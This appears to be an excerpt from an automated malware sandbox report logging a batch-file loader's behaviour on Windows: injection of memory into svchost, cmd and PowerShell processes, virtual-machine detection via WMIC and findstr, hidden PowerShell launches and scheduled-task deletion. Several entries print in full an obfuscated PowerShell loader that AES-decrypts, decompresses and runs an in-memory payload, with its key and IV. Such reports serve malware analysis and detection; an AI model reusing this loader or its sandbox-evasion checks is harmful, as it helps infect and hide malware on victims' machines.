Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 115765F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17E36BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 204616A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F119790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 166BBF70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 115765F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17E36BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 204616A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F119790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 166BBF70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 242A6F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 242A7150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1DEE3460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1BF02230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A607DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A621FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F96B9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F96B9F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1FD93340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2F9800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 187E4760000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2FBA00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 11576220000

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\users\user\desktop\q5n7wopk8j.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\windows\$cnt-onimai2\$cnt-co2.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] (''));
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:oxbndidjmsmp{param([outputtype([type])][parameter(position=0)][type[]]$kemhnhdqclrunv,[parameter(position=1)][type]$hgdpxlkyuq)$khfifhqytpa=[appdomain]::currentdomain.definedynamicassembly((new-object 